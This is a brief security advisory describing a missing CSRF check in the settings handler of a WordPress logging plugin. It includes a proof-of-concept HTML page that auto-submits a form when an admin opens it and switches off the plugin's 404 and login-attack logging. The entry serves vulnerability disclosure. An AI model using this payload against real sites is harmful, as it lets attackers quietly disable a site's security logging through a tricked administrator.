Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Make an admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=wp-logs-book" method="POST">
<input name="wplb_error_404_log" type="text" value="0">
<input name="wplb_login_attack_log" type="text" value="0">
<input name="wplb_save" type="text" value="Save">
<input type="submit" value="submit">
</form>
</body>
```